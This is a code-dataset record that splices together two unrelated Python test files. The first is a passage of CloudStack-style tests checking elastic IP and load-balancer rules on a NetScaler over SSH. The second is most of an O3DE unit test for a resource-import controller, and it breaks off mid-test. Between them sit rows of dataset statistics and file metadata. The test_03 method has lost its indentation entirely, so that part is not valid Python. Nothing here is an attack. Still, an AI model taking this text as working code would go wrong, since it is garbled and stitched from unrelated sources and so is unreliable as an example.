        2. An LB rule to port 22 exists for the VMs, and an ingress rule
           allows access from the universal CIDR (0.0.0.0/0).
        3. For the system-allocated LB rule IP: user_ip_address.is_system=1.
        4. The configuration is reflected on the NetScaler
           ("show ip" / "show lb vserver" - vservers up, USNIP : ON).
        """
        # Verify listSecurity groups response - only the default group exists.
        security_groups = SecurityGroup.list(
            self.apiclient,
            account=self.account.name,
            domainid=self.account.domainid
        )
        self.assertEqual(
            isinstance(security_groups, list),
            True,
            "Check for list security groups response"
        )
        self.assertEqual(
            len(security_groups),
            1,
            "Check List Security groups response"
        )
        self.debug("List Security groups response: %s" %
                   str(security_groups))
        security_group = security_groups[0]
        # Open port 22 from anywhere so the VMs would be reachable via EIP.
        self.debug(
            "Creating Ingress rule to allow SSH on default security group")
        cmd = authorizeSecurityGroupIngress.authorizeSecurityGroupIngressCmd()
        cmd.domainid = self.account.domainid
        cmd.account = self.account.name
        cmd.securitygroupid = security_group.id
        cmd.protocol = 'TCP'
        cmd.startport = 22
        cmd.endport = 22
        cmd.cidrlist = '0.0.0.0/0'
        self.apiclient.authorizeSecurityGroupIngress(cmd)
        self.debug(
            "Fetching LB IP for account: %s" % self.account.name)
        ip_addrs = PublicIPAddress.list(
            self.api_client,
            associatednetworkid=self.guest_network.id,
            account=self.account.name,
            domainid=self.account.domainid,
            forloadbalancing=True,
            listall=True
        )
        self.assertEqual(
            isinstance(ip_addrs, list),
            True,
            "List Public IP address should return valid IP address for network"
        )
        lb_ip = ip_addrs[0]
        self.debug("LB IP generated for account: %s is: %s" % (
            self.account.name,
            lb_ip.ipaddress
        ))
        # TODO: uncomment this after ssh issue is resolved
        # self.debug("SSHing into VMs using ELB IP: %s" % lb_ip.ipaddress)
        # try:
        #    ssh_1 = self.vm_1.get_ssh_client(ipaddress=lb_ip.ipaddress)
        #    self.debug("Command: hostname")
        #    result = ssh_1.execute("hostname")
        #    self.debug("Result: %s" % result)
        #
        #    if isinstance(result, list):
        #        res = result[0]
        #    else:
        #        self.fail("hostname retrieval failed!")
        #
        #    self.assertIn(
        #        res,
        #        [self.vm_1.name, self.vm_2.name],
        #        "SSH should return hostname of one of the VM"
        #    )
        #
        #    ssh_2 = self.vm_2.get_ssh_client(ipaddress=lb_ip.ipaddress)
        #    self.debug("Command: hostname")
        #    result = ssh_2.execute("hostname")
        #    self.debug("Result: %s" % result)
        #
        #    if isinstance(result, list):
        #        res = result[0]
        #    else:
        #        self.fail("hostname retrieval failed!")
        #    self.assertIn(
        #        res,
        #        [self.vm_1.name, self.vm_2.name],
        #        "SSH should return hostname of one of the VM"
        #    )
        # except Exception as e:
        #    self.fail(
        #        "SSH Access failed for %s: %s" % (self.vm_1.ipaddress, e))
        # Fetch details from user_ip_address table in database - the LB IP
        # was allocated by the system, so is_system must be 1.
        self.debug(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            lb_ip.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            lb_ip.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            1,
            "is_system value should be 1 for system generated LB rule"
        )
        # Verify the LB vserver configuration on the NetScaler appliance.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        try:
            ssh_client = SshClient(
                self.services["netscaler"]["ipaddress"],
                22,
                self.services["netscaler"]["username"],
                self.services["netscaler"]["password"],
            )
            self.debug("command: show ip")
            res = ssh_client.execute("show ip")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(lb_ip.ipaddress),
                1,
                "One IP from EIP pool should be taken and configured on NS"
            )
            self.debug("Command:show lb vserver")
            res = ssh_client.execute("show lb vserver")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(
                    "Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
                    (lb_ip.ipaddress,
                     lb_ip.ipaddress)),
                1,
                "User subnet IP should be enabled for LB service")
        except Exception as e:
            self.fail("SSH Access failed for %s: %s" %
                      (self.services["netscaler"]["ipaddress"], e))
        return
    @attr(tags=["eip"])
    def test_02_elb_acquire_and_create(self):
        """Test ELB by acquiring IP and then creating a LB rule.

        Validates that:
        1. Two instances are deployed (done in setUpClass).
        2. An LB rule to port 22 is created on an explicitly acquired IP,
           reachable via EIP:port from the universal CIDR (0.0.0.0/0).
        3. For the user-acquired LB rule IP: user_ip_address.is_system=0.
        4. The configuration is reflected on the NetScaler
           ("show ip" / "show lb vserver" - vservers up, USNIP : ON).
        """
        self.debug("Acquiring new IP for network: %s" % self.guest_network.id)
        public_ip = PublicIPAddress.create(
            self.apiclient,
            accountid=self.account.name,
            zoneid=self.zone.id,
            domainid=self.account.domainid,
            services=self.services["virtual_machine"]
        )
        self.debug("IP address: %s is acquired by network: %s" % (
            public_ip.ipaddress.ipaddress,
            self.guest_network.id))
        self.debug("Creating LB rule for public IP: %s" %
                   public_ip.ipaddress.ipaddress)
        # Explicit ipaddressid: the rule rides the acquired IP instead of a
        # system-allocated one.
        lb_rule = LoadBalancerRule.create(
            self.apiclient,
            self.services["lbrule"],
            accountid=self.account.name,
            ipaddressid=public_ip.ipaddress.id,
            networkid=self.guest_network.id,
            domainid=self.account.domainid
        )
        self.debug("Assigning VMs (%s, %s) to LB rule: %s" % (self.vm_1.name,
                                                              self.vm_2.name,
                                                              lb_rule.name))
        lb_rule.assign(self.apiclient, [self.vm_1, self.vm_2])
        # TODO: workaround : add route in the guest VM for SNIP
        #
        # self.debug("SSHing into VMs using ELB IP: %s" %
        #            public_ip.ipaddress)
        # try:
        #    ssh_1 = self.vm_1.get_ssh_client(
        #        ipaddress=public_ip.ipaddress)
        #    self.debug("Command: hostname")
        #    result = ssh_1.execute("hostname")
        #    self.debug("Result: %s" % result)
        #
        #    if isinstance(result, list):
        #        res = result[0]
        #    else:
        #        self.fail("hostname retrieval failed!")
        #    self.assertIn(
        #        res,
        #        [self.vm_1.name, self.vm_2.name],
        #        "SSH should return hostname of one of the VM"
        #    )
        #
        #    ssh_2 = self.vm_2.get_ssh_client(
        #        ipaddress=public_ip.ipaddress)
        #    self.debug("Command: hostname")
        #    result = ssh_2.execute("hostname")
        #    self.debug("Result: %s" % result)
        #
        #    if isinstance(result, list):
        #        res = result[0]
        #    else:
        #        self.fail("hostname retrieval failed!")
        #    self.assertIn(
        #        res,
        #        [self.vm_1.name, self.vm_2.name],
        #        "SSH should return hostname of one of the VM"
        #    )
        # except Exception as e:
        #    self.fail(
        #        "SSH Access failed for %s: %s" % (self.vm_1.ipaddress, e))
        #
        # Fetch details from user_ip_address table in database - the IP was
        # acquired by the user, so is_system must be 0.
        self.debug(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            public_ip.ipaddress.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            public_ip.ipaddress.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            0,
            "is_system value should be 0 for non-system generated LB rule"
        )
        # Verify the LB vserver configuration on the NetScaler appliance.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        try:
            ssh_client = SshClient(
                self.services["netscaler"]["ipaddress"],
                22,
                self.services["netscaler"]["username"],
                self.services["netscaler"]["password"],
            )
            self.debug("command: show ip")
            res = ssh_client.execute("show ip")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(public_ip.ipaddress.ipaddress),
                1,
                "One IP from EIP pool should be taken and configured on NS"
            )
            self.debug("Command:show lb vserver")
            res = ssh_client.execute("show lb vserver")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(
                    "Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
                    (public_ip.ipaddress.ipaddress,
                     public_ip.ipaddress.ipaddress)),
                1,
                "User subnet IP should be enabled for LB service")
        except Exception as e:
            self.fail("SSH Access failed for %s: %s" %
                      (self.services["netscaler"]["ipaddress"], e))
        return
@attr(tags=["eip"])
def test_03_elb_delete_lb_system(self):
"""Test delete LB rule generated with public IP with is_system = 1
"""
# Validate the following
# 1. Deleting LB rule should release EIP where is_system=1
# 2. check configuration changes for EIP reflects on NS
# commands to verify on NS:
# * "show ip"
# * "show lb vserer"-make sure that output says they are all up and
# running and USNIP : ON
self.debug(
"Fetching LB IP for account: %s" % self.account.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
account=self.account.name,
domainid=self.account.domainid,
forloadbalancing=True,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
lb_ip = ip_addrs[0]
self.debug("LB IP generated for account: %s is: %s" % (
self.account.name,
lb_ip.ipaddress
))
self.debug("Deleting LB rule: %s" % self.lb_rule.id)
self.lb_rule.delete(self.apiclient)
time.sleep(60)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(lb_ip.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show lb vserver")
res = ssh_client.execute("show lb vserver")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
(lb_ip.ipaddress,
lb_ip.ipaddress)),
1,
"User subnet IP should be enabled for LB service")
return
@attr(tags=["eip"])
def test_04_delete_lb_on_eip(self):
    """Test delete LB rule generated on EIP.

    Verifies that deleting a load-balancer rule on a user-acquired IP
    (is_system=0) does NOT release the IP via the API, while the LB
    configuration for it is removed from the NetScaler device.
    """
    # Validate the following
    # 1. Deleting LB rule won't release EIP where is_system=0
    # 2. disassociateIP must release the above IP
    # 3. check configuration changes for EIP reflects on NS
    # commands to verify on NS :
    # * "show ip"
    # * "show lb vserver" - make sure that output says they are all up and
    #   running and USNIP : ON

    # Fetch the internal account id from the account table in the database.
    self.debug(
        "select id from account where account_name='%s';"
        % self.account.name)
    qresultset = self.dbclient.execute(
        "select id from account where account_name='%s';"
        % self.account.name)
    self.assertEqual(
        isinstance(qresultset, list),
        True,
        "Check DB query result set for valid data"
    )
    self.assertNotEqual(
        len(qresultset),
        0,
        "DB query should return a valid public IP address"
    )
    qresult = qresultset[0]
    account_id = qresult[0]

    # Fetch the user-acquired (is_system=0) public IP for this account
    # from the user_ip_address table.
    self.debug(
        "select public_ip_address from user_ip_address where\
        is_system=0 and account_id=%s;" %
        account_id)
    qresultset = self.dbclient.execute(
        "select public_ip_address from user_ip_address where\
        is_system=0 and account_id=%s;" %
        account_id)
    self.assertEqual(
        isinstance(qresultset, list),
        True,
        "Check DB query result set for valid data"
    )
    self.assertNotEqual(
        len(qresultset),
        0,
        "DB query should return a valid public IP address"
    )
    qresult = qresultset[0]
    public_ip = qresult[0]

    self.debug(
        "Fetching public IP for account: %s" % self.account.name)
    ip_addrs = PublicIPAddress.list(
        self.api_client,
        ipaddress=public_ip,
        listall=True
    )
    self.debug("ip address list: %s" % ip_addrs)
    self.assertEqual(
        isinstance(ip_addrs, list),
        True,
        "List Public IP address should return valid IP address for network"
    )
    lb_ip = ip_addrs[0]

    # Find the LB rule attached to this IP and delete it.
    lb_rules = LoadBalancerRule.list(
        self.apiclient,
        publicipid=lb_ip.id,
        listall=True
    )
    self.assertEqual(
        isinstance(lb_rules, list),
        True,
        "Atleast one LB rule must be present for public IP address"
    )
    lb_rule = lb_rules[0]
    self.debug("Deleting LB rule associated with IP: %s" % public_ip)
    try:
        cmd = deleteLoadBalancerRule.deleteLoadBalancerRuleCmd()
        cmd.id = lb_rule.id
        self.apiclient.deleteLoadBalancerRule(cmd)
    except Exception as e:
        self.fail("Deleting LB rule failed for IP: %s-%s" % (public_ip, e))
    # TODO:check the lb rule list and then confirm that lb rule is deleted
    self.debug("LB rule deleted!")

    # The IP itself must survive the rule deletion (is_system=0).
    ip_addrs = PublicIPAddress.list(
        self.api_client,
        ipaddress=public_ip,
        listall=True
    )
    self.assertEqual(
        isinstance(ip_addrs, list),
        True,
        "Deleting LB rule should not delete public IP"
    )

    # Inspect the NetScaler over SSH: the LB configuration for the IP
    # must be gone even though the IP is still allocated in CloudStack.
    self.debug("SSH into netscaler: %s" %
               self.services["netscaler"]["ipaddress"])
    try:
        ssh_client = SshClient(
            self.services["netscaler"]["ipaddress"],
            22,
            self.services["netscaler"]["username"],
            self.services["netscaler"]["password"],
        )
        self.debug("command: show ip")
        res = ssh_client.execute("show ip")
        result = str(res)
        self.debug("Output: %s" % result)
        # BUGFIX: the failure messages below previously described the
        # positive condition (copy-pasted from test_03) although these
        # assertions check that the config is ABSENT from the NetScaler.
        self.assertNotEqual(
            result.count(public_ip),
            1,
            "IP should not remain configured on NS after LB rule deletion"
        )
        self.debug("Command:show lb vserver")
        res = ssh_client.execute("show lb vserver")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertNotEqual(
            result.count(
                "Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
                (lb_ip.ipaddress,
                 lb_ip.ipaddress)),
            1,
            "LB vserver for deleted rule should not remain configured on NS")
    except Exception as e:
        self.fail("SSH Access failed for %s: %s" %
                  (self.services["netscaler"]["ipaddress"], e))
    return
| 33.99419
| 88
| 0.539074
| 5,599
| 52,657
| 4.956957
| 0.0818
| 0.032752
| 0.02342
| 0.019601
| 0.823017
| 0.802443
| 0.781473
| 0.765763
| 0.750847
| 0.7342
| 0
| 0.009142
| 0.370568
| 52,657
| 1,548
| 89
| 34.01615
| 0.828234
| 0.186205
| 0
| 0.756206
| 0
| 0
| 0.178686
| 0.008362
| 0
| 0
| 0
| 0.001938
| 0.06383
| 1
| 0.015957
| false
| 0.010638
| 0.007979
| 0
| 0.041667
| 0.000887
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cefa8833fea565b264536529bf478b9d59d191b
| 27,669
|
py
|
Python
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 11
|
2021-07-08T09:58:26.000Z
|
2022-03-17T17:59:26.000Z
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
RoddieKieley/o3de
|
e804fd2a4241b039a42d9fa54eaae17dc94a7a92
|
[
"Apache-2.0",
"MIT"
] | 29
|
2021-07-06T19:33:52.000Z
|
2022-03-22T10:27:49.000Z
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
RoddieKieley/o3de
|
e804fd2a4241b039a42d9fa54eaae17dc94a7a92
|
[
"Apache-2.0",
"MIT"
] | 4
|
2021-07-06T19:24:43.000Z
|
2022-03-31T12:42:27.000Z
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
from typing import List
from unittest import TestCase
from unittest.mock import (call, MagicMock, patch)
from controller.import_resources_controller import ImportResourcesController
from model import constants
from model.basic_resource_attributes import (BasicResourceAttributes, BasicResourceAttributesBuilder)
from view.import_resources_page import ImportResourcesPageConstants
class TestImportResourcesController(TestCase):
    """
    ImportResourcesController unit test cases

    ConfigurationManager and ViewManager are patched in setUp, so every test
    drives the controller purely through mocks.  Button "clicks" are simulated
    by retrieving the callback captured by the mocked connect() call and
    invoking it directly; async work is exercised by running the runnable
    handed to the mocked ThreadManager.
    TODO: add test cases once error handling is ready
    """
    # Fixed fake identity/region shared by all test cases.
    _expected_account_id: str = "1234567890"
    _expected_region: str = "aws-global"
    _expected_lambda_name: str = "TestLambda"
    # Resource attributes expected when a Lambda function is imported.
    _expected_lambda_resource: BasicResourceAttributes = BasicResourceAttributesBuilder() \
        .build_type(constants.AWS_RESOURCE_TYPES[constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX]) \
        .build_name_id(_expected_lambda_name) \
        .build_region(_expected_region) \
        .build_account_id(_expected_account_id) \
        .build()
    _expected_cfn_stack_name: str = "TestStack"
    # Resource attributes expected for the CloudFormation stack itself.
    _expected_cfn_stack_resource: BasicResourceAttributes = BasicResourceAttributesBuilder() \
        .build_type(constants.AWS_RESOURCE_CLOUDFORMATION_STACK_TYPE) \
        .build_name_id(_expected_cfn_stack_name) \
        .build_account_id(_expected_account_id) \
        .build_region(_expected_region) \
        .build()

    def setUp(self) -> None:
        # Patch ConfigurationManager for the lifetime of each test.
        configuration_manager_patcher: patch = patch("controller.import_resources_controller.ConfigurationManager")
        self.addCleanup(configuration_manager_patcher.stop)
        self._mock_configuration_manager: MagicMock = configuration_manager_patcher.start()
        # Patch ViewManager likewise.
        view_manager_patcher: patch = patch("controller.import_resources_controller.ViewManager")
        self.addCleanup(view_manager_patcher.stop)
        self._mock_view_manager: MagicMock = view_manager_patcher.start()
        # Give the mocked configuration singleton the expected account/region.
        self._mocked_configuration_manager: MagicMock = self._mock_configuration_manager.get_instance.return_value
        self._mocked_configuration_manager.configuration.account_id = TestImportResourcesController._expected_account_id
        self._mocked_configuration_manager.configuration.region = TestImportResourcesController._expected_region
        # Convenience handles into the mocked view hierarchy.
        self._mocked_view_manager: MagicMock = self._mock_view_manager.get_instance.return_value
        self._mocked_import_resources_page: MagicMock = self._mocked_view_manager.get_import_resources_page.return_value
        self._mocked_tree_view: MagicMock = self._mocked_import_resources_page.tree_view
        self._mocked_proxy_model: MagicMock = self._mocked_tree_view.resource_proxy_model
        # Controller under test, with its sender objects replaced by mocks
        # so emissions can be asserted on.
        self._test_import_resources_controller: ImportResourcesController = ImportResourcesController()
        self._test_import_resources_controller.add_import_resources_sender = MagicMock()
        self._test_import_resources_controller.set_notification_frame_text_sender = MagicMock()
        self._test_import_resources_controller.setup()

    def test_reset_page_resetting_page_with_expected_state(self) -> None:
        # reset_page must clear the tree, return to the tree-view page,
        # deselect the resource-type combobox and clear the search version.
        self._test_import_resources_controller.reset_page()
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
        self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
        assert self._mocked_import_resources_page.search_version is None

    def test_setup_with_behavior_connected(self) -> None:
        # setup() (called in setUp) must wire every page widget signal to the
        # corresponding controller handler.
        self._mocked_import_resources_page.back_button.clicked.connect.assert_called_once_with(
            self._test_import_resources_controller._back_to_view_edit_page)
        self._mocked_import_resources_page.search_filter_input.returnPressed.connect.assert_called_once_with(
            self._test_import_resources_controller._filter_based_on_search_text)
        self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.assert_called_once_with(
            self._test_import_resources_controller._start_search_resources_async)
        self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.assert_called_once_with(
            self._test_import_resources_controller._import_resources)
        self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.assert_called_once_with(
            self._test_import_resources_controller._start_search_resources_async)
        self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.assert_called_once_with(
            self._test_import_resources_controller._import_resources)

    def test_page_back_button_switching_view_gets_invoked_and_resetting_page_with_expected_state(self) -> None:
        # Pull the callback captured by the mocked connect() and invoke it.
        mocked_call_args: call = \
            self._mocked_import_resources_page.back_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering back_button connected function
        self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
        self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
        assert self._mocked_import_resources_page.search_version is None

    def test_page_search_filter_input_invoke_proxy_model_with_expected_filter_text(self) -> None:
        expected_filter_text: str = "dummySearchFilter"
        self._mocked_import_resources_page.search_filter_input.text.return_value = expected_filter_text
        mocked_call_args: call = \
            self._mocked_import_resources_page.search_filter_input.returnPressed.connect.call_args[0]
        mocked_call_args[0]()  # triggering search_filter_input connected function
        # NOTE(review): this line CALLS the mock rather than asserting on it;
        # likely intended `clear_selection.assert_called_once()` - confirm.
        self._mocked_tree_view.clear_selection()
        assert self._mocked_proxy_model.filter_text == expected_filter_text

    def test_page_search_button_post_notification_when_search_version_is_unexpected(self) -> None:
        # An unknown search_version must post a notification and leave the
        # page untouched.
        self._mocked_import_resources_page.search_version = "dummySearchVersion"
        mocked_call_args: call = \
            self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering search_button connected function
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
        self._mocked_tree_view.reset_view.assert_not_called()
        self._mocked_import_resources_page.set_current_main_view_index.assert_not_called()

    @patch("controller.import_resources_controller.ThreadManager")
    def test_page_cfn_stacks_search_button_switch_page_with_expected_index_in_sync_process(
            self, mock_thread_manager: MagicMock) -> None:
        # The synchronous part of a CFN search: reset view, show the
        # notification page, and hand the async work to ThreadManager.
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        self._mocked_tree_view.reset_view.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
            ImportResourcesPageConstants.NOTIFICATION_PAGE_INDEX)
        mock_thread_manager.get_instance.return_value.start.assert_called_once()

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_cfn_stacks_search_button_no_resource_loaded_when_search_cfn_stacks_returns_empty_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # No stacks found: nothing should be loaded into the model.
        mock_aws_utils.list_cloudformation_stacks.return_value = []
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
            TestImportResourcesController._expected_region)
        mock_aws_utils.list_cloudformation_stack_resources.assert_not_called()
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_cfn_stacks_search_button_post_notification_when_search_cfn_stacks_raise_exception_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # Stack listing fails: a notification is posted, nothing is loaded.
        mock_aws_utils.list_cloudformation_stacks.side_effect = RuntimeError("dummyException")
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
            TestImportResourcesController._expected_region)
        mock_aws_utils.list_cloudformation_stack_resources.assert_not_called()
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_cfn_stacks_search_button_post_notification_when_search_cfn_resources_raise_exception_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # Stack found, but listing its resources fails.
        mock_aws_utils.list_cloudformation_stacks.return_value = \
            [TestImportResourcesController._expected_cfn_stack_name]
        mock_aws_utils.list_cloudformation_stack_resources.side_effect = RuntimeError("dummyException")
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
            TestImportResourcesController._expected_region)
        mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
            TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
        self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_cfn_stacks_search_button_no_resource_loaded_when_no_resource_found_under_cfn_stack_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        # Stack found but empty: model layout refreshes, nothing loaded.
        mock_aws_utils.list_cloudformation_stacks.return_value = \
            [TestImportResourcesController._expected_cfn_stack_name]
        mock_aws_utils.list_cloudformation_stack_resources.return_value = []
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
            TestImportResourcesController._expected_region)
        mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
            TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
        self._mocked_proxy_model.load_resource.assert_not_called()
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    @patch("controller.import_resources_controller.ThreadManager")
    @patch("controller.import_resources_controller.aws_utils")
    def test_page_cfn_stacks_search_button_expected_resource_loaded_when_resource_found_under_cfn_stack_in_async_process(
            self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
        self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
        mocked_call_args: call = \
            self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
        mocked_call_args[0]()  # triggering cfn_stacks_search_button connected function
        mock_thread_manager.get_instance.return_value.start.assert_called_once()
        mock_aws_utils.list_cloudformation_stacks.return_value = \
            [TestImportResourcesController._expected_cfn_stack_name]
        mock_aws_utils.list_cloudformation_stack_resources.return_value = \
            [TestImportResourcesController._expected_lambda_resource]
        mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
        mocked_async_call_args[0].run()  # triggering async function
        mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
            TestImportResourcesController._expected_region)
        mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
            TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
        # Both the stack itself and the resource inside it get loaded.
        expected_mocked_calls: List[call] = [call(TestImportResourcesController._expected_cfn_stack_resource),
                                             call(TestImportResourcesController._expected_lambda_resource)]
        self._mocked_proxy_model.load_resource.assert_has_calls(expected_mocked_calls)
        self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
        self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
            ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)

    def test_page_cfn_stacks_import_button_nothing_happened_when_selected_resources_are_empty(self) -> None:
        # Importing with no selection posts a notification and emits nothing.
